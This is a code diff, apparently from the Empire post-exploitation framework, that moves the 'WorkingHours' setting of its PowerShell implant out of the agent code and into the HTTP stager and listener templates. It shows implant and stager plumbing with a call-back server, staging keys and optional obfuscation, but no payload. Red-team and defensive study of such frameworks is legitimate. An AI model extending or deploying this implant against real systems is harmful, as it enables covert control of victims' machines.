WorkingHours fix

data/agent/agent.ps1

@@ -95,6 +95,7 @@ function Invoke-Empire {
     $script:LostLimit = $LostLimit
     $script:MissedCheckins = 0
     $script:ResultIDs = @{}
+    $script:WorkingHours = $WorkingHours
     $script:DefaultResponse = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DefaultResponse))
 
     # the currently active server
@@ -209,11 +210,11 @@ function Invoke-Empire {
     function Set-WorkingHours {
         param([string]$hours)
         $script:WorkingHours = $hours
-        "agent working hours set to $script:WorkingHours"
+        "agent working hours set to $($script:WorkingHours)"
     }
 
     function Get-WorkingHours {
-        "agent working hours: $script:WorkingHours"
+        "agent working hours: $($script:WorkingHours)"
     }
 
     function Get-Sysinfo {

data/agent/stagers/http.ps1

@@ -210,7 +210,7 @@ function Start-Negotiate {
     [GC]::Collect();
 
     # TODO: remove this shitty $server logic
-    Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID;
+    Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE";
 }
 # $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
 Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u;

lib/listeners/http.py

@@ -395,6 +395,7 @@ class Listener:
         uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
         launcher = listenerOptions['Launcher']['Value']
         stagingKey = listenerOptions['StagingKey']['Value']
+        workingHours = listenerOptions['WorkingHours']['Value']
         host = listenerOptions['Host']['Value']
         customHeaders = profile.split('|')[2:]
 
@@ -418,6 +419,10 @@ class Listener:
                 headers = ','.join(customHeaders)
                 stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
 
+            #patch in working hours, if any
+            if workingHours != "":
+                stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
+
             # patch the server and key information
             stager = stager.replace('REPLACE_SERVER', host)
             stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
@@ -495,7 +500,6 @@ class Listener:
         profile = listenerOptions['DefaultProfile']['Value']
         lostLimit = listenerOptions['DefaultLostLimit']['Value']
         killDate = listenerOptions['KillDate']['Value']
-        workingHours = listenerOptions['WorkingHours']['Value']
         b64DefaultResponse = base64.b64encode(self.default_response())
 
         if language == 'powershell':
@@ -521,8 +525,6 @@ class Listener:
             # patch in the killDate and workingHours if they're specified
             if killDate != "":
                 code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
-            if workingHours != "":
-                code = code.replace('$WorkingHours,', "$WorkingHours = '" + str(workingHours) + "',")
             if obfuscate:
                 code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
             return code